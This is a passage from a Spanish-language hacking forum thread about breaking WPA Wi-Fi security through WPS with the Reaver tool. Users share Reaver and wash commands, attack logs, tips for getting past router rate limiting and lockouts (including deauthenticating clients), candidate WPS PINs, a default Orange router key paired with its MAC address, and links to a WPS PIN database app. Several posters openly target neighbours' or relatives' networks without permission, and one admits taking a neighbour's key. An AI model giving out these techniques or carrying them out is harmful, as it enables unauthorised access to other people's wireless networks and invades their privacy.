He estado también tocando varios parámetros del reaver, como fijar el canal. autodetectar opciones, añadir essid y varias más, pero no hay suerte, siempre me tira el mismo warning y no pasa del primer pin.
A ver si alguien me puede echar un cable con esto, ya digo que problema del router no será, puesto que llegó a funcionar de manera puntual. Alguien sabe si puede haber algun bug con esta version o algo similar? (estoy en wifiway 3.4)

Mil gracias :D


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: HalconEye en 9 Diciembre 2012, 10:12 am
Eso me ha ocurrido con algunos routers de timofónica....y no es la antena,porque he probado con varias...o no pasa del primer pin por defecto....o te arroja la wpa en segundos.
Es lo que tienen las WLAN_XXXX,...
Saliendo un poco del hilo,el otro día atacando una wep(qué cosas) y por no tirar de wlandecrypter y wepattack (como en los viejos tiempos),opté por beini....nada,ni se movían los datas...despues con airoscript y nada...luego con multiattack fijando un solo objetivo...y nada.
Por último caí en la cuenta de que tenía instalado wifyte(en xubuntu 10.10 por si le interesa a alguien saberlo) y me aventurá a probarlo y BINGO,este sí que hizo su trabajo y en poco más de 15 minutos....
Pero lo que me llamó la atención es que si fijas x objetivos,te dice hasta el tiempo estimado en juakearlos...lo cual me hará probar este programa de manera intensiva durante la noche,a ver qué me dice de las wpa.
Salud


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: broña en 11 Diciembre 2012, 08:10 am
Hola a todos, he probado 2 redes tipo WLAN_XXXX 8C:xx y las dos se queda al 99,9%. ¿Alguna solución?

Me respondo...no había visto el post...Perdón..

https://foro.elhacker.net/wireless_en_linux/reaverwifislax_mod_para_problema_99-t376970.0.html

Salu2


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: zamolxe en 13 Diciembre 2012, 17:27 pm
Modelo del router?, deja mas datos. Estas lejos del AP?, audita con airodump a ese bssid+canal solamente, y dime los valores RXQ y PWR.

Si son malos, intenta mejorarlos acercandote al AP. Si no los comprendes, echa un ojo a la wiki de airodump-ng para comprenderlos  :D http://www.aircrack-ng.org/doku.php?id=es:airodump-ng (http://www.aircrack-ng.org/doku.php?id=es:airodump-ng) . El PWR tiene que estar por debajo de 70 mas o menos, si no.. Lo mas probable esque falle el ataque.
El mac 00:26:4d:06:xx:xx ,(la red es un EasyBox-0...) PWR-68 RXQ-95 , estoy en alemania. Acabo de intentar con el backTrack 5, con el reaver y me pasa lo mismo. Creo q no estoy bastante cerca del AP y tendre q comprar una antena


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: robeiniesta90 en 14 Diciembre 2012, 09:30 am
Modelo del router?, deja mas datos. Estas lejos del AP?, audita con airodump a ese bssid+canal solamente, y dime los valores RXQ y PWR.

Si son malos, intenta mejorarlos acercandote al AP. Si no los comprendes, echa un ojo a la wiki de airodump-ng para comprenderlos  :D http://www.aircrack-ng.org/doku.php?id=es:airodump-ng (http://www.aircrack-ng.org/doku.php?id=es:airodump-ng) . El PWR tiene que estar por debajo de 70 mas o menos, si no.. Lo mas probable esque falle el ataque.

buenas, os pongo mis dos dudas:

1. Con xiaopan a mi me pasa iugal, siempre repite le mismo pin, con el reaver 1.4, lo raro que si uso wifislax si me avanza... el router lo tengo a 3 metros...

2 Con wifislax cuando lleva un rato probando pines, se estanca en el 0.65 y me dice todo el rato timeout de response...   pero no em dice nada de bloqueado ni que he llegado al limite de intentos... etc...

p.d. es vodafoneXXXX, un hawuei

saludos.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: adrihamel en 14 Diciembre 2012, 15:07 pm
Buenas, hace poco instalaron cerca de mi casa un router de ONOXXXXXX(6X) con mac 00:18:E7 (los ultimos 6 digitos de la mac, corresponden cn los 6 digitos del ssid) y cuando me voy a conectar veo que tiene el wps activado. Es una wpa2-psk 802.11n. Cuando he ido a usar reaver 1.4 con backtrack 5 r3, pongo en una consola "reaver -i mon0 -b 00:18:E7:XX:XX:XX -vv no avanza nada, se queda probando el pin 12345670. Estoy haciendo algo mal? Alguien sabe algo sobre este router de ono(6x)? fabricante, pin, clave, y esos routers de ono suelen tener 30, 50 y 100 megas no? salu2


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: beholdthe en 15 Diciembre 2012, 00:08 am
Buenas, hace poco instalaron cerca de mi casa un router de ONOXXXXXX(6X) con mac 00:18:E7 (los ultimos 6 digitos de la mac, corresponden cn los 6 digitos del ssid) y cuando me voy a conectar veo que tiene el wps activado. Es una wpa2-psk 802.11n. Cuando he ido a usar reaver 1.4 con backtrack 5 r3, pongo en una consola "reaver -i mon0 -b 00:18:E7:XX:XX:XX -vv no avanza nada, se queda probando el pin 12345670. Estoy haciendo algo mal? Alguien sabe algo sobre este router de ono(6x)? fabricante, pin, clave, y esos routers de ono suelen tener 30, 50 y 100 megas no? salu2

Reaver cada día que pasa peor funciona, no se si porque algunos routers se han parcheado o por que, pero cuando no le pasa una cosa, le pasa otra...


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: adrihamel en 15 Diciembre 2012, 19:40 pm
Reaver cada día que pasa peor funciona, no se si porque algunos routers se han parcheado o por que, pero cuando no le pasa una cosa, le pasa otra...
Crees que se puede arreglar si utilizo la version reaver 1.3? He visto paginas en internet diciendo la gente que el reaver 1.3 les funciona mejor que el reaver 1.4. Probare con la otra version de reaver a ver si avanza aunque siendo un router de ono (6x) con el wps activado creo que va a ser imposible capturar la clave. Si sabeis algo o teneis datos de esta red mandarmelo por mensaje salu2 y gracias de antemano


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: beholdthe en 15 Diciembre 2012, 23:58 pm
Crees que se puede arreglar si utilizo la version reaver 1.3? He visto paginas en internet diciendo la gente que el reaver 1.3 les funciona mejor que el reaver 1.4. Probare con la otra version de reaver a ver si avanza aunque siendo un router de ono (6x) con el wps activado creo que va a ser imposible capturar la clave. Si sabeis algo o teneis datos de esta red mandarmelo por mensaje salu2 y gracias de antemano

He utilizado todas las versiones que hay de reaver, las que se supone que arreglan el problema del 99.99%, otras que se supone que hacen o arreglan no se que mas cosas...    JAMAS NOTE LA MENOR DIFERENCIA CON EL REAVER ORIGINAL, salvo por los colorines y 4 pijadas mas.
Pero esa es mi experiencia (aunque llevo mucho tiempo, prácticamente desde que salio) con REAVER, otro igual si que le han funcionado esas otras versiones.
Reaver funcionaba muchísimo mejor que ahora, pero repito que esa es mi opinión, y como dije antes, no se si es porque los routers están parcheados, o por que razón, pero no soy el único que lo dice.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: adrihamel en 17 Diciembre 2012, 19:10 pm
Entonces puede ser que tenga un fireware contra reaver y por eso al lanzar los pines no avanza aunque cada x tiempo manda un pin o dos seguidos pero luego se estanca. De todas formas gracias por tu ayuda (:


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: beholdthe en 17 Diciembre 2012, 22:44 pm
Entonces puede ser que tenga un fireware contra reaver y por eso al lanzar los pines no avanza aunque cada x tiempo manda un pin o dos seguidos pero luego se estanca. De todas formas gracias por tu ayuda (:
Que tenga WPS activado el router, no quiere decir que SEA VULNERABLE A REAVER, o dicho de mejor manera, que puedas atacar la red y obtener un resultado POSITIVO.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: adrihamel en 18 Diciembre 2012, 22:39 pm
Estoy probando otra red con wps. Es una vodafone con mac 20:2B:C1 y va probando los pines poco a poco, saliendo muchos wearing y (!) pero si el porcentaje avanza esque voy bien no? bueno quiero continuar mañana y para guardar la sesion en reaver, en el escritorio doy a la casita y me sale un archivo, en mi caso (202BC1XXXXXX.wpc) y lo he copiado a un pendrive. El caso es que queria ver si con este proceso guardaba la sesion, ya que con salvar sesion reaver, nunca he conseguido avanzar, y lo pongo con el comando reaver -i mon0 -b 20:2B:C1:XX:XX:XX -c 1 -s /etc/reaver/202BC1XXXXXX.wpc -vv y cuando cominza me salen letras. Mi pregunta es: sabeis alguna manera que guarde la sesion reaver en wifiway 3.4 y que cuando quiera continuar, siga por donde lo deje? salu2


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: El_Andaluz en 19 Diciembre 2012, 02:28 am
Aqui estoy de vuelta jajaja adrihamel todavía me acuerdo de ti segun tu sacastes una clave de oragen-xxxx wpa2 cosa que no me creo nada, te recuerdo que me dijistes que ibas a sacar un programa espero que sea verdad. A aqui las mentiras no nos gustan. >:D


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: adrihamel en 19 Diciembre 2012, 21:17 pm
Aqui estoy de vuelta jajaja adrihamel todavía me acuerdo de ti segun tu sacastes una clave de oragen-xxxx wpa2 cosa que no me creo nada, te recuerdo que me dijistes que ibas a sacar un programa espero que sea verdad. A aqui las mentiras no nos gustan. >:D
Buenas elsevi, si saque una de orange 00:19:70, pero parece ser que se dieron cuenta o algo y quitaron el wps. Al conectarme puse la clave que consegui pero creo que la cambiaron. Supongo que la consegui por pura potra ya que he intentado con otras de orange (5C:33:8E) y algunos routers puedo madar hasta 10 pines seguidos, pero se bloquean despues, y al no saberme el pin completo no puedo hacer nada, y otros, al primer pin, ya se bloquean. El programa ya lo deje, porque no tenia suficientes datos de las orange y no sacaba mucho en comun. Si tienes tu datos de orange, clave, pin, modelo de router, nombre, mac pues mandamelo por privado y retomare el programa salu2

NO nos gustan los ladrones


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: El_Andaluz en 19 Diciembre 2012, 21:28 pm
Si tengo datos pero es muy dificil sacar un programa para las orange-xxxx tenia que ser claves por defecto y la mayoría de la gente cambian la clave por defecto por una personal, lo que se podria intentar es modificar el diccionario del wpscragui no se alguien que sepa bien programar y haga posibles pines para las orange no se como tu lo ves pero yo de programacion no se nada si alguien se anima que me lo diga por aqui. :D


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: beholdthe en 19 Diciembre 2012, 22:23 pm
si saque una de orange 00:19:70, pero parece ser que se dieron cuenta o algo y quitaron el wps.

Y yo intentando ayudar mensajes atrás al típico niñato para que este haciendo el imbécil todo el día con las redes de sus vecinos...
Sigo sin entender porque no expulsan a este tipo de...  en fin.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: otsemari en 20 Diciembre 2012, 12:49 pm
Señores acabo de hacerlo con una WLAN_YYXX con bssid 5c:33:8e:xx:xx:.... con encriptacion wpa y ha tardado tres dias pero me ha dado al final lo que queria.



Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: otsemari en 20 Diciembre 2012, 13:21 pm
Ahora lo estoy intentando con un router de mi cuñado es de orange es Orange-yyxy con bssid co:ac:54...... pero me dice WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking
Que debo de hacer?, tocar el router por dentro o cambiar el modo de ataque?
Aunque si toco la configuracion del router, es trampa no?
Gracias.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: P4nd3m0n1um en 21 Diciembre 2012, 02:21 am
Si tengo datos pero es muy dificil sacar un programa para las orange-xxxx tenia que ser claves por defecto y la mayoría de la gente cambian la clave por defecto por una personal, lo que se podria intentar es modificar el diccionario del wpscragui no se alguien que sepa bien programar y haga posibles pines para las orange no se como tu lo ves pero yo de programacion no se nada si alguien se anima que me lo diga por aqui. :D

y como seria?? hay patrón de inicio?


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: P4nd3m0n1um en 21 Diciembre 2012, 02:22 am
Ahora lo estoy intentando con un router de mi cuñado es de orange es Orange-yyxy con bssid co:ac:54...... pero me dice WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking
Que debo de hacer?, tocar el router por dentro o cambiar el modo de ataque?
Aunque si toco la configuracion del router, es trampa no?
Gracias.

Nada esperar.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: El_Andaluz en 21 Diciembre 2012, 03:32 am
P4nd3m0n1um: La verdad no tengo un patron claro pero segun los datos que yo tengo se podria hacer un diccionario asin por pines por defecto posibles para las orange, bueno haber las orange-xxxx son letras mayusculas y numeros la clave por defecto son 26 caractares, van del 1-9 y no es del 0-9 como dicen por hay en otros foros despues las letras va de la A Mayuscula ha la F Mayuscula , la cosa esta aqui los numeros en algunas claves por defecto se llega a repetir entre 4 veces en algunas despues la letras mas de lo mismo o una se hace un diccionario con estas posibles claves o se hace un programa con todo lo datos de claves por defecto de los router de orange pero como se hace esto ? ni idea. :(

Seria hacer posibles claves por defecto pero con estos datos ?


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: P4nd3m0n1um en 21 Diciembre 2012, 09:50 am
hexadecimal de 26 caracteres.. seguro?  :laugh: yo ataque una red me dio 26 caracteres, reinicio el ataque.. me dio 8..  :laugh:


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: HalconEye en 21 Diciembre 2012, 11:21 am
La única clave que tengo de un orange_xyyx(x=número,y=letra) consta de 26 caracteres alfanuméricos,TODOS EN MAYÚSCULAS,en bloques de 4 caracteres....algo así como 4 4 4 4 4 4 2...letras y números mezclados,...podría ser que no hubiese más letras a partir de la F....como en wep,pero no podría afirmarlo...


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: El_Andaluz en 21 Diciembre 2012, 20:23 pm
Pademonium: Tu eres de españa me da un coraje que me discuta una cosa que yo he visto y que llevo investigando mucho tiempo y que he visto un monton de router de orange-xxxx con tipo seguridad wpa2 yo afirmo que en las wpa2 ccmp psk que son la mayoria de las orange-xxxx va desde la A-F Y YA ESTA Y NUMEROS DEL 1-9 NO EXISTE el 0, JODER COJERSE UN ROUTER Y MIRARLO y como dice malamadre67 si va en bloques de 4 caracteres mira os pongo un ejemplo de una oarage-xxxx.

clave por defecto: 5C13 F3A5 AAD9 E74F 246E 3AC2 36
 
Tipo de seguridad: WPA2 CCMP PSK

Modelo Sagem

Despues en lo demas router vienen asin todas las claves no es igual que aqui son aleatorias lo caracteres son los mismo 26 en todo tipo de esto router de orange-xxxx con esta seguridad son asin claro varia las repeticiones de los numeros o letras en otros se repite mas la A hasta 4 veces los numeros 4 veces asin.... entendeis o no


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: P4nd3m0n1um en 22 Diciembre 2012, 02:06 am
Pademonium: Tu eres de españa me da un coraje

España! ajjaja máximo llegue a pisar escocia, argento a morir.

JODER COJERSE UN ROUTER Y MIRARLO

mándame uno por correo.

clave por defecto: 5C13 F3A5 AAD9 E74F 246E 3AC2 36

si fuera por defecto todos tendrían el mismo, tendrías que tener al menos unas 10 como para ver si se respetan donde están los números o las letras.. como para achicar el dic,.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: HalconEye en 22 Diciembre 2012, 22:25 pm
otra por defecto: orange_x26x,x= letra minúscula entre la a-f

77A7 C3CD F491 2FF4 F529 9C1C 42

La única coincidencia que veo comparándola con la de elsevi,es que los dos últimos dígitos son números....ni uno solo de mi círculo tiene un maldito router de orange,aunque no valga....por lo que me cuesta recopilar información...


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: P4nd3m0n1um en 23 Diciembre 2012, 01:04 am
5C13 F3A5 AAD9 E74F 246E 3AC2 36
77A7 C3CD F491 2FF4 F529 9C1C 42

bien entonces podemos decir que tomando estas dos como referencia que los últimos 2 dígitos serán siempre números. Luego tenemos varios otros que puedan que sean siempre números. Con eso se achicaría un poco el diccionario, pero de algún lado sale, habría que ve la MAC Address, jugar un poco con MD5 y SHA1 como para ver haber algún patrón en particular.

NO DESVINCULAR TEMA


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: El_Andaluz en 23 Diciembre 2012, 20:28 pm
Pues si he estado mirando mas claves por defecto de esto router de orange y se da el caso que casi todo termina en numeros los dos ultimos esta que yo puse : 5C13 F3A5 AAD9 E74F 246E 3AC2 36 la mac es esta mirar : 00:19:70:51:96:2F algunos numeros coincide pero es dificil sacar todavía un patron lo del md5 y sha1 y esto para que nos serviria sacarias algo en concreto ? tengo mas claves por defecto.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: P4nd3m0n1um en 24 Diciembre 2012, 01:58 am
Pues si he estado mirando mas claves por defecto de esto router de orange y se da el caso que casi todo termina en numeros los dos ultimos esta que yo puse : 5C13 F3A5 AAD9 E74F 246E 3AC2 36 la mac es esta mirar : 00:19:70:51:96:2F algunos numeros coincide pero es dificil sacar todavía un patron lo del md5 y sha1 y esto para que nos serviria sacarias algo en concreto ? tengo mas claves por defecto.

mmm tengo algo..  :laugh: :laugh: tiene WPS no? tenes idea como empieza? los primeros 4 nomas.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: El_Andaluz en 24 Diciembre 2012, 03:43 am
mmm tienes algo dime dime si kieres dimelo por privado o por aqui que se te ha ocurrido si tiene wps activado que si tengo idea de como empienza el que ?? dime que se te ha ocurrido


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: El_Andaluz en 24 Diciembre 2012, 04:07 am
meladonor: Haz el favor de no poner mas publicidad, y menos en este post leete las normas del foro :¬¬ el tema no lo que tu pones esto es una pagina seria.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: P4nd3m0n1um en 24 Diciembre 2012, 04:21 am
PIN:
42866230
47838396
59261842


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: magp_90 en 24 Diciembre 2012, 12:10 pm
Yo tb estoy interesado en las orange. Esos pings de donde salen??


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: El_Andaluz en 24 Diciembre 2012, 13:28 pm
P4nd3m0n1um: Esa era tu idea los pines pero eso pines de donde lo sacaste consultandolo en el wpscragui o algo estas seguro que algunos de esos pines me serviria para las orange con esta mac : 00:19:70 a ti te han servido algunos dimee


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: P4nd3m0n1um en 24 Diciembre 2012, 13:53 pm
Prueba y dime.. si cae se como sacarlo..


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: El_Andaluz en 24 Diciembre 2012, 14:14 pm
Vale de acuerdo voy probar los 3 pines que tu me has dado si lo saco te lo comento por aqui y si no lo saco tambien muchas gracias P4nd3m0n1um. Haber si tengo suerto ;-)


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: lekaja en 24 Diciembre 2012, 14:20 pm
PIN:
42866230
47838396
59261842
pues para mi eso pines no me ha servido con las orange 00:19:70  :-[ un salu2


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: El_Andaluz en 24 Diciembre 2012, 14:30 pm
lekaja : Tu lo has probado estos pines que ha puesto nuestro compañero P4nd3m0n1um ?  Dime en que porcentaje se te keda cada pin que probastes yo lo voy a intentar aora haber si hay suerte.

P4nd3m0n1um: Tengo el wifilax 4.3 version final voy a probarlo hay escuchame donde me recomiendas que haga la prueba con estos pines en reaver 1.4 o el wpscragui y con que comando me recomiendas mejor para hacerlo con el de  -p verdad para meter el pin .


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: P4nd3m0n1um en 24 Diciembre 2012, 16:48 pm
lekaja : Tu lo has probado estos pines que ha puesto nuestro compañero P4nd3m0n1um ?  Dime en que porcentaje se te keda cada pin que probastes yo lo voy a intentar aora haber si hay suerte.

P4nd3m0n1um: Tengo el wifilax 4.3 version final voy a probarlo hay escuchame donde me recomiendas que haga la prueba con estos pines en reaver 1.4 o el wpscragui y con que comando me recomiendas mejor para hacerlo con el de  -p verdad para meter el pin .

tiene que probarlo el elsevi con la mac que puso, mandarle con cualquier reaver.. no creo que sea tan simple pero...


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: HalconEye en 25 Diciembre 2012, 13:25 pm
Probando estoy el primer pin de pandemonium,...la asociación es instantánea prácticamente....el M1,M2,M3,M4 es "reconocido" y aceptado por el router....




Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

  • Waiting for beacon from 00:19:70:YY:XY:YY
  • Associated with 00:19:70:YY:XY:YY (ESSID: Orange-YYYx)
  • 90.91% complete @ 2012-12-25 12:44:55 (0 seconds/pin)
  • 90.91% complete @ 2012-12-25 12:46:14 (0 seconds/pin)
  • 90.92% complete @ 2012-12-25 12:47:14 (232 seconds/pin)
  • 90.93% complete @ 2012-12-25 12:48:06 (142 seconds/pin)
  • 90.93% complete @ 2012-12-25 12:49:02 (170 seconds/pin)
  • 90.93% complete @ 2012-12-25 12:50:13 (205 seconds/pin)
  • 90.95% complete @ 2012-12-25 12:51:25 (120 seconds/pin)
  • 90.95% complete @ 2012-12-25 12:52:21 (134 seconds/pin)
  • 90.95% complete @ 2012-12-25 12:53:16 (148 seconds/pin)
Estaba sin el -vv....

  • Sending EAPOL START request
  • Received identity request
  • Sending identity response
  • Received M1 message
  • Sending M2 message
  • Received M3 message
  • Sending M4 message
  • Received WSC NACK
  • Sending WSC NACK
  • Trying pin 42866237
^C
  • Session saved.

Ya continuaré experimentando...estoy con la alfa awuso36h desde el salón y no la mejor ubicación para este orange...sólo he probado un pin completo 42866230,directamente me ha pasado al 90,91%.....luego ha seguido probando con el último número del pin hasta estancarse en el 7...

con el otro pin,después de tirarse un rato con el ,se pasa a probar con el último acabado en 0 y ahí se queda..lo curioso es que da los M1,M2,M3,M4 igual que con el otro pin... :huh:

  • 90.91% complete @ 2012-12-25 13:18:58 (0 seconds/pin)
  • Trying pin 47838390
  • Sending EAPOL START request
  • [!] WARNING: Receive timeout occurred
  • Sending EAPOL START request
  • Received identity request
  • Sending identity response
  • [!] WARNING: Receive timeout occurred
  • Sending WSC NACK
  • [!] WPS transaction failed (code: 0x02), re-trying last pin
  • Trying pin 47838390
  • Sending EAPOL START request
  • [!] WARNING: Receive timeout occurred
  • Sending EAPOL START request
  • Received identity request
  • Sending identity response
  • Received identity request
  • Sending identity response
  • Received M1 message
  • Sending M2 message
  • Received M3 message
  • Sending M4 message
  • [!] WARNING: Receive timeout occurred
  • Sending WSC NACK
  • Trying pin 47838390



Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: El_Andaluz en 25 Diciembre 2012, 17:57 pm
Eso lo que quiere decir es que esta buscando los 4 primeros numeros del pin si te ha lanzado un M4  es por eso pero se te bloqueara y no te dejara seguir a mi se me ha bloqueado al rato y me lanzaba lo mismo que a ti he probado los  3 pines que distes pandemonium y no me valio ninguno tio .


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: P4nd3m0n1um en 26 Diciembre 2012, 02:00 am
@malamadre67: En teoría si estas en 90% es que ya encontraste los primeros 4 dígitos. "4286" Solamente te faltarian 4, que por lo general el ataque no dura mas de 3hs.. pero habría que verlo..

@elsevi: Bien eso esta bien, pues no tendría que ser tan simple..


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: karlostek en 26 Diciembre 2012, 04:11 am
hola,cuando miro lo de la protección wps si esta activado o no me pone 0x04 , eso que quiere decir?que esta activado o no el wps?


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: P4nd3m0n1um en 26 Diciembre 2012, 04:58 am
hola,cuando miro lo de la protección wps si esta activado o no me pone 0x04 , eso que quiere decir?que esta activado o no el wps?

Si el Wash te dice que si, es que tiene.. o WPSpy, WPScan..


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: P4nd3m0n1um en 26 Diciembre 2012, 05:04 am
De paso les dejo el WPSPin:

(https://sourceforge.net/projects/wpspin/screenshots/Screenshot_2012-12-26-00-20-32.png)

WPSPin es una aplicación para Android que posee una gran base de datos con pines de WPS que podemos utilizar para atacar routers mediante a Reaver-WPS.

Requerimientos:

 * Android 2.3.* o Superior.

Capturas (Samsung Galaxy SII):

(https://sourceforge.net/projects/wpspin/screenshots/Screenshot_2012-12-26-00-21-31.png)
(https://sourceforge.net/projects/wpspin/screenshots/Screenshot_2012-12-26-00-21-38.png)
(https://sourceforge.net/projects/wpspin/screenshots/Screenshot_2012-12-26-00-22-34.png)



Pueden descargarlo desde: https://sourceforge.net/projects/wpspin/ (https://sourceforge.net/projects/wpspin/)


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: P4nd3m0n1um en 26 Diciembre 2012, 07:02 am
Nueva versión v1.0.2:

(http://i.minus.com/icxVjkuxBZsVh.png)

* BASE DE DATOS: MAC ADDRESS: #117 PINES: #315.-

DESCARGA: https://sourceforge.net/projects/wpspin/files/WPSPin%20v1.0.2/? (https://sourceforge.net/projects/wpspin/files/WPSPin%20v1.0.2/?)



Nueva versión v1.0.3:

(http://i.minus.com/iLiadMVZ2jg9m.PNG)

* BASE DE DATOS: MAC ADDRESS: #148 PINES: #450.-
* Solucionados 5 Bug de Busqueda de Pin.

DESCARGA: https://sourceforge.net/projects/wpspin/files/WPSPin%20v1.0.3/? (https://sourceforge.net/projects/wpspin/files/WPSPin%20v1.0.3/?)


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: HalconEye en 26 Diciembre 2012, 13:43 pm
He probado el wpspin escrito en python para xubuntu....sin desmerecer el trabajo de nadie,ni el esfuerzo....pero SIEMPRE acabo usando reaver...es decir,por medio de scripts se automatiza todo el proceso...para obtener los mismos resultados que utilizando reaver directamente...lo digo por si os da por probarlo y aprovechando que también existe la "aplicación" para pc....en las capturas de pantalla están las fuentes....aunque a CraigHefnner ya le conocéis :laugh:

(http://i1156.photobucket.com/albums/p567/bassllekano/SOFTWARE/WPSPIN1.png)
(http://i1156.photobucket.com/albums/p567/bassllekano/SOFTWARE/WPSPIN2.png)





Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: El_Andaluz en 26 Diciembre 2012, 17:51 pm
El wpspin ya viene incluido en la ultima version del wifislax 4.3 y yo ya lo he probado solo vale para mac que este soportodas si no estan dentro de esa listad de mac dentro del programa no sacarais nunca la clave os dara un pin como de prueba por si acaso cuela pero nada mas yo con esto no he sacado niguna orange para lo que kiera sacar las fte le viene muy bien.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: magp_90 en 26 Diciembre 2012, 18:22 pm
el sevi has probado a cambiar la mac por la de un cliente???? Me refiero a las orange, a lo mejor asi evitariamos el bloqueo del router. ¿Por cierto, sabes cuanto tarda en desbloquearse?? A mi varios dias....


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: karlostek en 26 Diciembre 2012, 19:20 pm
Si el Wash te dice que si, es que tiene.. o WPSpy, WPScan..

pone wps y donde deberia poner 0x01(manual) y 0x02(activado) pone 0x04...

perdón que insista,eso que quiere decir,que esta activado o que no?


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: HalconEye en 26 Diciembre 2012, 21:24 pm
debería ponerte YES o NO...algo así como esto:

# sudo wash -i mon0
Wash v1.4 WiFi Protected Setup Scan Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

BSSID                  Channel       RSSI       WPS Version       WPS Locked        ESSID
---------------------------------------------------------------------------------------------------------------
62:C0:6F:XX:XX:XX       4            -63        1.0               No                vodafoneXYYY
00:19:15:XX:XX:XX      11            -93        1.0               No                blablabla
C0:AC:54:XX:XX:XX       6            -89        1.0               No                Orange-xxyy
5C:33:8E:XX:XX:XX       6            -86        1.0               Yes               Orange-yyxy


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: P4nd3m0n1um en 27 Diciembre 2012, 00:40 am
el sevi has probado a cambiar la mac por la de un cliente???? Me refiero a las orange, a lo mejor asi evitariamos el bloqueo del router. ¿Por cierto, sabes cuanto tarda en desbloquearse?? A mi varios dias....

no tiene nada que ver pues el WPS es un camino y el WPA/WPA2 es otro.. por mas que clones va a ser como si no estuviera conectado, ahora si el usuario uso wps ahí pueda que si.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: El_Andaluz en 27 Diciembre 2012, 05:25 am
Haber las que pone WPS Locked  NO esas si se pueden atacar quieres decir que si tienes el WPS activado y las que pones WPS  YES quieres decir que esta bloqueadas verdad.

magp_90 : Si que he probado lo que tu me has dicho varias veces pero no sirve para nada por que no se asocia bien para desbloquearlo hay un truquillo que lo mismo puede servir a mi me ha servido varias veces para atacar esa red que es desautentificar al cliente hacer que se caiga y se vuelva conectar hay de desactiva el bloqueo y le puedes volver atacar pero se te bloqueara otra vez o lo mismo no depende a mi algunas me tardan en desbloquearse en las orange hasta 4 dias y otras se desbloquea en unas orange que son wpa2.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: Xwolf en 27 Diciembre 2012, 06:41 am
Muchachos!

KUESTION!!!!

hace una semana prueba de darle a un mac de Cisco

la primera noche... 8 %
al otro dia... NO ME DEJABA tirarle (constantemente me tiraba el 0x02)
al dia siguiente del dia siguiente... pum!!! RETOMA 14,4 %

ahora... hace una semana que estoy intentandole dar y nada...
puede ser que el router se bloquee??
Es un cisco cuya mac empieza con 68:7f:74

y la opcion que use era
reaver - i mon0 - b LA MAC -vv

NADA MAS!!!!

tambien intente con - L - S - N -d 2 a 5

pero nada!!!

que ondas???
saludos


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: magp_90 en 27 Diciembre 2012, 09:48 am
el sevi, me podrias poner el comando que usas para desautentificar al cliente??


